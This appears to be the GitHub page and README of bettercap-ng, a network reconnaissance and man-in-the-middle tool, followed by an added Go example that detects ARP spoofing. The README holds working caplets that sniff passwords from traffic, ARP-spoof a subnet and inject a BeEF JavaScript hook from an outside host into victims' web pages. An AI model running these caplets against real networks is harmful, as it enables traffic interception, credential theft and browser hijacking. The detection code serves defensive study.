The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 network reconnaissance and MITM attacks.
2018-01-10 03:20:00 +01:00
caplets refact: net.sniffer -> net.sniff 2018-01-10 03:16:52 +01:00
core new: SNI packet sniffer + sniffer refactoring. 2018-01-10 01:48:41 +01:00
firewall new: centralized logging and implemented DELETE /api/events route, closes #5 2018-01-08 06:39:44 +01:00
log fix: fixed logging 2018-01-09 19:55:18 +01:00
modules fix: fixed a crash when net.sniff stats was called and sniffer was off 2018-01-10 03:20:00 +01:00
net refact: divided os specific code for arp parsing 2018-01-09 20:03:39 +01:00
packets new: centralized logging and implemented DELETE /api/events route, closes #5 2018-01-08 06:39:44 +01:00
session new: improved menu and per module help 2018-01-09 22:23:11 +01:00
tls new: api.rest is now on HTTPS (closes #5) 2018-01-08 07:37:29 +01:00
.gitignore Fixed compilation 2018-01-07 16:38:34 +01:00
.travis.yml fix: added libpcap-dev to travis file. 2018-01-07 16:57:06 +01:00
LICENSE.md preparing for github 2018-01-07 16:29:56 +01:00
main.go fix: logging improved 2018-01-09 14:21:34 +01:00
Makefile refact: refactored RestAPI module routes 2018-01-08 08:51:07 +01:00
README.md refact: net.sniffer -> net.sniff 2018-01-10 03:16:52 +01:00

BetterCap

bettercap-ng



This is a WIP of the new version of bettercap, very alpha, do not use ... or do, whatever.

Compiling

Make sure you have a correctly configured Go >= 1.8 environment and the libpcap-dev package installed for your system, then:

git clone https://github.com/evilsocket/bettercap-ng $GOPATH/src/github.com/evilsocket/bettercap-ng
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
make deps
make

To show the command line options:

# sudo ./bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Caplets

Interactive sessions can be scripted with .cap files, or caplets. The following are a few basic examples; look in the caplets folder for more.

caplets/simple-password-sniffer.cap

Simple password sniffer.

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on

caplets/rest-api.cap

Start a rest API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on

Get information about the current session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

Get last 50 events:

curl -k --user bcap:bcap "https://bettercap-ip:8083/api/events?n=50"

Clear events:

curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/beef-inject.cap

Use a proxy script to inject a BeEF JavaScript hook:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

The caplets/beef-inject.js proxy script file:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
            res.Updated();
        }
    }
}
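
Seen from the defending side, the arp.spoof step in the caplet above leaves a trace in a victim's ARP cache: the same hardware address can end up mapped to more than one IP, typically the gateway and the spoofing host. The Go program below is an added example, not part of bettercap-ng; the name SharedMACs and the sample table are constructed for illustration, and it assumes the Linux /proc/net/arp layout.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strings"
)

// Constructed sample (/proc/net/arp layout): gateway .1 and host .64 share one MAC.
const sampleARP = `IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:64     *        eth0
192.168.1.10     0x1         0x2         aa:bb:cc:00:00:10     *        eth0
192.168.1.64     0x1         0x2         AA:BB:CC:00:00:64     *        eth0
192.168.1.99     0x1         0x0         00:00:00:00:00:00     *        eth0
`

// SharedMACs parses an ARP table and returns every hardware address that
// answers for more than one IP, mapped to the sorted list of those IPs.
func SharedMACs(table string) map[string][]string {
	byMAC := map[string][]string{}
	sc := bufio.NewScanner(strings.NewReader(table))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		// Skip the header row and anything too short to be an entry.
		if len(f) < 6 || f[0] == "IP" {
			continue
		}
		ip, flags, mac := f[0], f[2], strings.ToLower(f[3])
		// Flags 0x0 marks an incomplete entry with no resolved address.
		if flags == "0x0" || mac == "00:00:00:00:00:00" {
			continue
		}
		byMAC[mac] = append(byMAC[mac], ip)
	}
	for mac, ips := range byMAC {
		if len(ips) < 2 {
			delete(byMAC, mac) // one IP per MAC is the normal case
		}
		sort.Strings(ips)
	}
	return byMAC
}

func main() {
	for mac, ips := range SharedMACs(sampleARP) {
		fmt.Printf("ALERT %s claims %s\n", mac, strings.Join(ips, ", "))
	}
}
```

A shared MAC is a lead rather than proof: routers with several addresses and proxy ARP produce the same pattern, so compare the result against the gateway's known hardware address.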

Interactive Mode

Interactive mode allows you to start and stop modules manually, change options and apply new firewall rules on the fly. To show the help menu type help; for module-specific help use help module-name.

License

bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they're released under the GPL 3 license.